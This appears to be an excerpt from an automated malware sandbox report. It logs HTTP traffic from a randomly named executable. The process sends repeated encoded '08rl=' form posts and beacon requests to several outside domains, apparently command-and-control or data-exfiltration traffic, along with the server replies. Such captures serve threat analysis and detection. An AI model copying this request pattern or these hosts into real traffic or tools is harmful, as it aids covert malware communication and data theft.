                                                                      Data Raw: 30 38 72 6c 3d 4e 6a 4c 70 6a 77 62 34 71 4c 70 37 35 4f 51 62 42 71 70 42 30 6a 6e 4a 4d 65 4c 75 77 48 44 6d 4f 6b 37 30 75 76 47 65 65 47 2b 71 44 77 59 4f 36 41 38 33 71 6f 56 4e 6a 4d 6e 67 51 62 33 66 6f 6c 46 52 44 6a 53 38 53 46 45 39 42 56 39 37 32 48 55 72 52 72 39 4e 54 37 49 74 4d 6f 4d 4c 6e 63 45 74 41 42 4b 65 39 52 68 70 4e 54 53 69 51 74 43 62 77 6c 4d 69 44 35 33 72 51 54 67 6a 41 31 42 55 64 6f 69 36 46 79 44 56 57 63 45 61 75 7a 39 36 6f 44 2f 72 34 63 4e 32 30 30 33 35 6b 45 71 74 65 43 4e 48 45 79 7a 34 36 72 6c 69 31 45 54 74 34 58 64 6b 32 6c 74 43 56 53 4d 62 68 63 34 4d 51 6b 70 34 42 37 36 39 48 7a 63 76 4c 55 37 77 67 48 6a 37 6c 65 6d 39 42 4f 37 31 31 67 3d 3d
                                                                      Data Ascii: 08rl=NjLpjwb4qLp75OQbBqpB0jnJMeLuwHDmOk70uvGeeG+qDwYO6A83qoVNjMngQb3folFRDjS8SFE9BV972HUrRr9NT7ItMoMLncEtABKe9RhpNTSiQtCbwlMiD53rQTgjA1BUdoi6FyDVWcEauz96oD/r4cN20035kEqteCNHEyz46rli1ETt4Xdk2ltCVSMbhc4MQkp4B769HzcvLU7wgHj7lem9BO711g==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.6500223.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:15.871022940 CET1793OUTPOST /qfli/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.scottlasher.org
                                                                      Origin: http://www.scottlasher.org
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.scottlasher.org/qfli/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 4e 6a 4c 70 6a 77 62 34 71 4c 70 37 35 4f 51 62 42 71 70 42 30 6a 6e 4a 4d 65 4c 75 77 48 44 6d 4f 6b 37 30 75 76 47 65 65 48 47 71 44 43 51 4f 37 6a 55 33 72 6f 56 4e 2f 63 6e 68 51 62 32 64 6f 6c 64 56 44 6a 65 47 53 48 4d 39 48 48 46 37 33 31 73 72 4b 37 39 4e 52 37 49 73 42 49 4e 54 6e 63 55 70 41 42 36 65 39 52 68 70 4e 51 4b 69 41 4d 43 62 79 6c 4d 68 55 4a 33 5a 62 7a 67 4c 41 31 4a 69 64 6f 75 51 46 42 4c 56 57 36 6b 61 39 31 52 36 33 54 2f 74 39 63 4e 55 30 30 37 6d 6b 45 32 62 65 43 35 39 45 31 62 34 34 66 4d 44 71 31 76 47 69 58 52 34 73 48 52 77 52 55 45 71 6d 71 34 39 52 79 64 38 50 5a 44 51 4a 58 64 30 4a 30 61 4d 71 6c 48 4c 70 61 65 69 4a 2b 57 71 6f 4f 4b 57 4c 45 68 2b 44 76 70 36 63 59 30 71 35 31 75 68 45 57 75 6d 34 32 32 36 78 53 49 69 74 51 46 50 2f 59 55 4c 38 2b 44 5a 34 61 2f 46 2f 4e 51 4c 6f 42 4b 78 67 73 31 76 4a 6c 73 61 63 50 7a 39 34 56 51 6f 55 50 4b 32 58 6f 41 68 66 65 4a 57 39 59 50 42 64 73 66 66 4f 62 4f 4c 37 71 7a 45 61 63 72 58 32 6d 5a 73 31 [TRUNCATED]
                                                                      Data Ascii: 08rl=NjLpjwb4qLp75OQbBqpB0jnJMeLuwHDmOk70uvGeeHGqDCQO7jU3roVN/cnhQb2doldVDjeGSHM9HHF731srK79NR7IsBINTncUpAB6e9RhpNQKiAMCbylMhUJ3ZbzgLA1JidouQFBLVW6ka91R63T/t9cNU007mkE2beC59E1b44fMDq1vGiXR4sHRwRUEqmq49Ryd8PZDQJXd0J0aMqlHLpaeiJ+WqoOKWLEh+Dvp6cY0q51uhEWum4226xSIitQFP/YUL8+DZ4a/F/NQLoBKxgs1vJlsacPz94VQoUPK2XoAhfeJW9YPBdsffObOL7qzEacrX2mZs1sMp3YjuONvaIN5Vauk5TtDH8ftOyvo2CFEQqAVRz1WyjJDBxAZKcNLNXrwMczHv9zALyW6UqXHQWpx1arnCi1EQB/Rhd3kyIKZbVc8ElGeUQWMMxH9TYV1NpbLCdYG4fXFx8hETKcVzYaClsj4wutdYW6kMB5XGRBjFq1HkuJAxE7SZGrYymfg/2U7krJjm+jSADnkOZVmgF9savSYpbXWczeuwKoSSfrm30XBrBMmk8Ms/qgeXVxaNfGwLx05RRvIm3fVGlP19aYWn+NwvgHAf7Zb8krYkGdWF55rpU9rwa6joTeyJZlbi2rDhUqpFextGwIJNAXD5jH86TjvSdvRprkn+Npf1SXix7PbyqIQbBuge7CqZ6QITCVE17xWTOzh2+EkOrlxq5ywYS4oIlV26iqXVp9zqrpVVQd6jSlTpPHW/7i+2NWhL7mrkS+nOIdPxIEIVapX6QbkU/ETDTrHCF9enw+LwdhhDQ6KgdqbRe5tN1iXDfK3AsSod01L5MtekvKaimawcThgNa31cG4bSBoStQJiP7OmMODoDGqiKp3eoRlA2FXc8dC2RfT/DUiI8TWP5UT5PJz9o4xXem1uImmhBKV7jXXkGOh0H0qn660c8rR0O6D4fKo3qVgWZeU7tqpdZCJFPVl1irGgFSbOilsu+EcPi/4S [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      36192.168.2.6500233.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:18.420304060 CET489OUTGET /qfli/?08rl=AhjJgGShipZbwfgYBrBs/D/6J4md1mWyL0Dn1+DGXWSLPyEvzD8Lt8QIg++AaZimhExVJRS0A24jbF5v5l0xXr0xTbRwbZ4D/8YFIQmCxUZGKyC9Et+i1GoSGLb+TRIhDWVWAYM=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.scottlasher.org
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:24:19.039012909 CET408INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:24:18 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 268
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 38 72 6c 3d 41 68 6a 4a 67 47 53 68 69 70 5a 62 77 66 67 59 42 72 42 73 2f 44 2f 36 4a 34 6d 64 31 6d 57 79 4c 30 44 6e 31 2b 44 47 58 57 53 4c 50 79 45 76 7a 44 38 4c 74 38 51 49 67 2b 2b 41 61 5a 69 6d 68 45 78 56 4a 52 53 30 41 32 34 6a 62 46 35 76 35 6c 30 78 58 72 30 78 54 62 52 77 62 5a 34 44 2f 38 59 46 49 51 6d 43 78 55 5a 47 4b 79 43 39 45 74 2b 69 31 47 6f 53 47 4c 62 2b 54 52 49 68 44 57 56 57 41 59 4d 3d 26 49 72 50 4c 63 3d 4b 6e 62 34 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?08rl=AhjJgGShipZbwfgYBrBs/D/6J4md1mWyL0Dn1+DGXWSLPyEvzD8Lt8QIg++AaZimhExVJRS0A24jbF5v5l0xXr0xTbRwbZ4D/8YFIQmCxUZGKyC9Et+i1GoSGLb+TRIhDWVWAYM=&IrPLc=Knb4R"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      37192.168.2.6500243.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:24.119405985 CET747OUTPOST /e6d9/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.6686vi38.app
                                                                      Origin: http://www.6686vi38.app
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.6686vi38.app/e6d9/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 75 73 43 2b 54 62 76 62 56 6a 44 34 53 4e 6a 64 4f 34 6a 42 70 33 6d 63 41 58 48 58 78 59 79 6c 79 51 4e 4c 41 78 4c 4e 39 36 72 6e 76 73 78 56 58 4f 2b 76 38 70 57 56 2f 33 72 76 43 6d 4c 52 79 58 58 4f 78 4c 2f 55 77 73 4d 75 4f 68 41 70 54 39 65 45 5a 4e 6c 44 6a 6a 73 6e 51 30 34 53 65 57 37 4b 6d 53 6f 67 66 53 6b 34 39 70 6c 42 58 41 70 79 59 6c 65 4a 77 76 52 67 49 39 37 65 4a 59 52 46 76 44 48 6e 76 49 4f 75 36 75 62 30 53 48 31 32 63 76 30 44 30 74 4b 39 56 5a 43 39 47 68 42 38 57 65 76 67 6d 46 51 62 76 56 48 65 34 6d 64 58 73 46 4b 59 70 5a 62 48 68 6f 35 6b 32 4d 4a 65 65 78 76 45 72 77 43 75
                                                                      Data Ascii: 08rl=usC+TbvbVjD4SNjdO4jBp3mcAXHXxYylyQNLAxLN96rnvsxVXO+v8pWV/3rvCmLRyXXOxL/UwsMuOhApT9eEZNlDjjsnQ04SeW7KmSogfSk49plBXApyYleJwvRgI97eJYRFvDHnvIOu6ub0SH12cv0D0tK9VZC9GhB8WevgmFQbvVHe4mdXsFKYpZbHho5k2MJeexvErwCu


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      38192.168.2.6500253.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:26.674861908 CET771OUTPOST /e6d9/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.6686vi38.app
                                                                      Origin: http://www.6686vi38.app
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.6686vi38.app/e6d9/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 75 73 43 2b 54 62 76 62 56 6a 44 34 54 73 54 64 42 37 37 42 72 58 6d 62 63 48 48 58 2f 34 79 70 79 51 4a 4c 41 77 2f 64 2b 50 37 6e 75 4d 42 56 57 50 2b 76 77 4a 57 56 30 58 71 6c 49 47 4b 64 79 58 4c 77 78 4c 7a 55 77 74 6f 75 4f 6a 6f 70 55 4f 47 48 59 64 6c 42 76 44 73 68 64 55 34 53 65 57 37 4b 6d 57 42 31 66 53 38 34 38 5a 31 42 57 6c 46 78 52 46 65 57 6e 66 52 67 65 4e 37 61 4a 59 52 6e 76 43 62 4e 76 4c 36 75 36 71 66 30 52 57 31 78 57 76 30 42 72 39 4c 43 5a 36 69 34 42 51 30 37 56 70 57 42 35 46 63 61 71 6a 61 45 6b 56 64 30 2b 56 71 61 70 62 44 31 68 49 35 4f 30 4d 78 65 4d 6d 6a 6a 6b 45 6e 4e 63 74 75 4a 58 61 44 4e 6e 46 37 62 48 78 4a 67 37 31 30 69 51 77 3d 3d
                                                                      Data Ascii: 08rl=usC+TbvbVjD4TsTdB77BrXmbcHHX/4ypyQJLAw/d+P7nuMBVWP+vwJWV0XqlIGKdyXLwxLzUwtouOjopUOGHYdlBvDshdU4SeW7KmWB1fS848Z1BWlFxRFeWnfRgeN7aJYRnvCbNvL6u6qf0RW1xWv0Br9LCZ6i4BQ07VpWB5FcaqjaEkVd0+VqapbD1hI5O0MxeMmjjkEnNctuJXaDNnF7bHxJg710iQw==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      39192.168.2.6500263.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:29.220798016 CET1784OUTPOST /e6d9/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.6686vi38.app
                                                                      Origin: http://www.6686vi38.app
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.6686vi38.app/e6d9/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 75 73 43 2b 54 62 76 62 56 6a 44 34 54 73 54 64 42 37 37 42 72 58 6d 62 63 48 48 58 2f 34 79 70 79 51 4a 4c 41 77 2f 64 2b 4d 62 6e 75 2f 35 56 58 73 47 76 7a 4a 57 56 35 33 71 6d 49 47 4c 48 79 58 54 73 78 4b 4f 76 77 76 67 75 4f 43 49 70 52 2f 47 48 4e 4e 6c 42 31 6a 73 6b 51 30 35 51 65 57 4c 57 6d 53 6c 31 66 53 38 34 38 66 35 42 52 77 70 78 58 46 65 4a 77 76 52 38 49 39 37 2b 4a 59 5a 64 76 44 76 33 76 34 69 75 36 4f 37 30 65 45 64 78 61 76 30 48 71 39 4c 61 5a 36 76 6f 42 51 59 52 56 73 44 73 35 43 55 61 6f 57 33 66 34 51 38 69 2f 44 69 5a 34 5a 43 4c 6e 38 4a 6c 73 4e 46 45 64 58 48 50 72 67 72 65 61 5a 71 4f 54 70 57 76 68 6b 33 4f 4e 32 34 58 32 48 70 58 50 33 33 36 42 6f 49 77 6f 79 62 6a 69 67 6e 58 65 49 43 74 4f 66 76 4d 75 74 59 32 45 63 38 62 6f 4c 36 43 41 6c 41 68 79 5a 32 46 35 72 6d 4c 61 36 31 2f 5a 64 50 55 37 78 6c 32 78 51 64 49 35 5a 43 54 38 75 57 77 6c 48 32 6f 49 46 42 50 31 58 46 38 36 50 43 4e 66 53 34 2b 4f 7a 73 48 30 7a 7a 34 64 48 4b 58 4e 65 4d 30 53 [TRUNCATED]
                                                                      Data Ascii: 08rl=usC+TbvbVjD4TsTdB77BrXmbcHHX/4ypyQJLAw/d+Mbnu/5VXsGvzJWV53qmIGLHyXTsxKOvwvguOCIpR/GHNNlB1jskQ05QeWLWmSl1fS848f5BRwpxXFeJwvR8I97+JYZdvDv3v4iu6O70eEdxav0Hq9LaZ6voBQYRVsDs5CUaoW3f4Q8i/DiZ4ZCLn8JlsNFEdXHPrgreaZqOTpWvhk3ON24X2HpXP336BoIwoybjignXeICtOfvMutY2Ec8boL6CAlAhyZ2F5rmLa61/ZdPU7xl2xQdI5ZCT8uWwlH2oIFBP1XF86PCNfS4+OzsH0zz4dHKXNeM0SCS9jz0yNfjhPEYu1Hc/EUPMgbmUPeM5Gl1xg7TsjFmbwztEI5/1HqrSejKrk4kxOxnwkRbpKKYT6FEUbP09J97pggM8dMQWv7h6kgabWsyFARWXBFHBG7FA8vhD5RYkCNIkpL53Ms8FQIMdOqFnlY3Yig1DYRJRgju8/U0Vr5pgV9FHvbYu4qJ+9FyI0Vmcw2GcyDWCmTHwjDrCdABiiNoKtthdb3GOVqByU7A3OFUcE36kxejJx2COM6SnLQ0m3b7+f6P13a4yB54qqAqpsJ0p4HtnOwDedWIOZ7EuMMrarS6vJlqRQNFJp/uVg4fn38MSCZAnni82wG5omp00CDcUjGQEpOsuGaNE6DNDdCNOgSw9bpLY/29NfK1UhsOi/hrPEo/etXlO/tWq7YUer/L1MRH9nUE0EWHJ37MKFKXl0rxl5gWr2EBhEBtwuAY1KUmvfv7ZG0nk0FpaGU+3R+xgg6mHxKfKcewl9o7C5avKsWRAhvLtblHnA8TRvkDrDiiCFGarul2xzVMjRL5jwjYBH3FfrUqnoiI0i3nKVwHJYzY9vpbV9R09vad0NKfTk3vMzZgbI5Us0rpiGFCXgjqQP3VfUaN4B9ewUXNLtmTFcuQDAL67Zn0YdOmZoOgEQy+eVyLhEa2/cHCfyOHJdPTReUUj1Spfqmt [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      40192.168.2.6500273.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:31.782250881 CET486OUTGET /e6d9/?08rl=juqeQrGFcwXITpngL7PunlS6Yziuw637mWk4bg3F0fjFlN57WeOsxPDa4F2hA37igEjN+72Gm9ppMBBjdsyFL/sZnzl7KntfJA7AgFspXms44/5oaxJKfEyU2eFPJ97BOLt+kFY=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.6686vi38.app
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:24:32.391520977 CET408INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:24:32 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 268
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 38 72 6c 3d 6a 75 71 65 51 72 47 46 63 77 58 49 54 70 6e 67 4c 37 50 75 6e 6c 53 36 59 7a 69 75 77 36 33 37 6d 57 6b 34 62 67 33 46 30 66 6a 46 6c 4e 35 37 57 65 4f 73 78 50 44 61 34 46 32 68 41 33 37 69 67 45 6a 4e 2b 37 32 47 6d 39 70 70 4d 42 42 6a 64 73 79 46 4c 2f 73 5a 6e 7a 6c 37 4b 6e 74 66 4a 41 37 41 67 46 73 70 58 6d 73 34 34 2f 35 6f 61 78 4a 4b 66 45 79 55 32 65 46 50 4a 39 37 42 4f 4c 74 2b 6b 46 59 3d 26 49 72 50 4c 63 3d 4b 6e 62 34 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?08rl=juqeQrGFcwXITpngL7PunlS6Yziuw637mWk4bg3F0fjFlN57WeOsxPDa4F2hA37igEjN+72Gm9ppMBBjdsyFL/sZnzl7KntfJA7AgFspXms44/5oaxJKfEyU2eFPJ97BOLt+kFY=&IrPLc=Knb4R"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      41192.168.2.650028162.241.85.94804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:37.876487017 CET756OUTPOST /m9ej/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.papampalli.shop
                                                                      Origin: http://www.papampalli.shop
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.papampalli.shop/m9ej/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 74 64 38 4d 61 65 37 68 77 4b 33 45 50 75 45 57 2f 72 7a 44 52 51 4e 34 31 33 53 4b 76 76 65 4b 32 41 6f 5a 47 6a 71 46 4f 57 67 6a 53 4e 38 35 76 72 2b 53 50 33 53 72 41 78 2f 52 56 52 2f 4c 30 77 76 31 65 65 6e 63 56 58 78 65 6b 6d 58 53 65 45 69 34 2b 42 2f 63 52 34 46 70 71 54 6b 77 5a 74 54 4b 31 61 6a 4e 31 35 71 39 51 53 31 7a 4d 45 30 67 72 6f 54 75 4d 50 79 6d 30 74 7a 56 64 64 57 63 77 6f 4f 6b 6a 35 6f 6a 4d 45 49 6f 42 6b 47 4f 57 59 47 4b 33 74 2b 4f 35 6c 39 74 32 59 69 5a 39 47 5a 7a 61 64 38 42 4b 4f 61 4c 69 6c 54 4e 51 38 35 52 48 52 69 38 33 56 6e 31 31 33 30 2f 73 70 63 64 33 52 68 42
                                                                      Data Ascii: 08rl=td8Mae7hwK3EPuEW/rzDRQN413SKvveK2AoZGjqFOWgjSN85vr+SP3SrAx/RVR/L0wv1eencVXxekmXSeEi4+B/cR4FpqTkwZtTK1ajN15q9QS1zME0groTuMPym0tzVddWcwoOkj5ojMEIoBkGOWYGK3t+O5l9t2YiZ9GZzad8BKOaLilTNQ85RHRi83Vn1130/spcd3RhB
                                                                      Nov 6, 2024 05:24:38.764127970 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:24:38 GMT
                                                                      Server: Apache
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/"
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Vary: Accept-Encoding
                                                                      Content-Encoding: gzip
                                                                      Content-Length: 15116
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed b2 ed 96 e3 c6 b1 2d f8 bb b8 96 de 21 1b bd 5a 4d ca 04 08 f0 ab 58 e0 87 5a 96 ed 7b 7c d7 b1 e5 51 cb 73 ae 97 a4 e9 95 04 12 40 76 25 32 e1 cc 04 3f 1a ae 07 9a d7 98 27 9b c0 07 49 90 04 8b 54 77 cb 77 66 1d b1 8a 20 32 32 62 47 c4 de fb 6e f6 e2 0f df 7d fb c3 3f fe f6 47 14 e9 98 2d 5a 77 b3 fc 17 31 cc c3 b9 41 b8 f9 f7 b7 46 11 24 d8 87 df bb 59 4c 34 46 5e 84 a5 22 7a 6e fc fd 87 3f 99 13 03 f5 0e 57 1c c7 64 6e ac 28 59 27 42 6a 03 79 82 6b c2 21 75 4d 7d 1d cd 7d b2 a2 1e 31 8b 43 17 51 4e 35 c5 cc 54 1e 66 64 ee 18 05 0c a3 fc 11 49 c2 e6 46 22 45 40 19 31 50 24 49 30 37 22 ad 13 e5 f6 7a 61 9c 84 96 90 61 6f 13 f0 9e 53 55 69 aa 19 59 fc 0d 87 04 71 a1 51 20 52 ee a3 2f 5f 4e fa 8e 33 45 7f d9 a2 df 33 11 ce 7a 65 56 ab 36 ea 6b 29 96 42 ab d7 fb 41 5f c7 78 63 d2 18 80 cc 44 92 7c 11 97 61 19 92 d7 f9 96 87 e1 5e fb 5c e5 09 01 d1 5e f4 ba 9c f0 75 af 97 e0 04 c7 09 66 8c 5a 2a 12 c9 49 91 81 99 26 92 63 0d 3b e9 6d 02 44 e1 24 61 d4 c3 9a 0a de 93 4a [TRUNCATED]
                                                                      Data Ascii: -!ZMXZ{|Qs@v%2?'ITwwf 22bGn}?G-Zw1AF$YL4F^"zn?Wdn(Y'Bjyk!uM}}1CQN5TfdIF"E@1P$I07"zaaoSUiYqQ R/_N3E3zeV6k)BA_xcD|a^\^ufZ*I&c;mD$aJn3K)!)'z[W%P^VXhexK;oR]['&c{+$J6'X!Kq=.>ry\qQUv`,x|G{E<TpP]25\A8^2.Npwkp:ODP~<DP]lW'K|\.}%p~0gJ[FK2,YoWj1M6)e,Z>([b1"Y'Bj*),0D>{.{~ .(L.'`@x]uFK+U:pbNb(D0 $Fu^/oPPey":1e5|3WoGsljn3'RBX H3TC(5@=9
                                                                      Nov 6, 2024 05:24:38.764162064 CET1236INData Raw: f5 c2 cb a3 d4 fc b4 73 a0 b9 16 6b 13 73 1a e3 9c fd d2 56 e7 ae b2 8e f2 b3 15 55 74 49 19 d5 5b 17 45 d4 f7 09 9f 3e ed f8 6e dd 35 b6 b9 66 5b 57 82 bc 99 69 1e 2a 0a 71 81 2f 18 4d 6e dd 97 b6 7d bf 0c 82 e9 79 86 ca 99 f1 8b 9c b1 77 3f ba
                                                                      Data Ascii: sksVUtI[E>n5f[Wi*q/Mn}yw?rF?kG8$G!Cpsu{Zg%%WHyr9QDPUSIJi&N@tr=KEu7P_2Myvf!&4}bO71)Fn*Cd
                                                                      Nov 6, 2024 05:24:38.764173985 CET424INData Raw: 24 d2 3f 8b 8c ce 22 e4 3a 0e b4 ee 4c 0b 09 48 2c de d3 9d 06 b5 4d fd 3c ad 3f de b3 bf 74 96 46 c3 d5 b2 ba ea 3c 55 08 ce 41 f5 60 a7 fa 0a 4b 24 e7 46 ca 7d 12 50 4e 7c e3 c5 5c 6f 13 22 02 f4 5f 42 3e 12 f9 3f 98 58 62 f6 d6 13 09 f9 f2 4b
                                                                      Data Ascii: $?":LH,M<?tF<UA`K$F}PN|\o"_B>?XbKEX(Ws1$!mwqamtllM`O3|u_OHb0"1~nm}#)fV>&";&s]<>H%iA,m)
                                                                      Nov 6, 2024 05:24:38.764187098 CET1236INData Raw: 29 0d da 86 58 be 27 9e 36 e6 3b 9e 80 21 83 a7 f1 92 c8 5a cc d2 34 26 60 c7 38 01 fe f2 71 fe 00 02 75 ac 15 66 29 f9 2e 68 77 66 b5 8c df 8d ed e1 c4 b6 01 e6 0c 7a c7 e4 0f 90 a9 3a 7b af d4 a3 4f 1e d6 60 1b a0 ea a9 ba e7 29 63 4f ed 62 d8
                                                                      Data Ascii: )X'6;!Z4&`8quf).hwfz:{O`)cOb/!wx-+~%<*}W^sH`vw~,PEtZN7~@,lH~fFcX4%]8zt10
                                                                      Nov 6, 2024 05:24:38.764249086 CET1236INData Raw: af 3a 17 5b 9f 32 7c e8 5d a7 f1 72 ff b6 d3 ef 43 1f bb eb 4c ec 7d 7b bb db b7 27 5d 67 60 5f ed de 60 89 7c 82 0b f6 7a 8e 86 fe a8 0f 33 8c ba f6 81 86 3c 38 ea 3a 76 15 fc 45 a3 94 2d 0f 6c 48 e2 5f eb 5f 6b 55 f1 d0 b7 ef bb c3 31 fc 5f 6b
                                                                      Data Ascii: :[2|]rCL}{']g`_`|z3<8:vE-lH__kU1_k"ro;7PgE&{v,26UB<-C5y:\:by1O1h0t4K%I*W6)G0inK!}NGS@l8Kvw
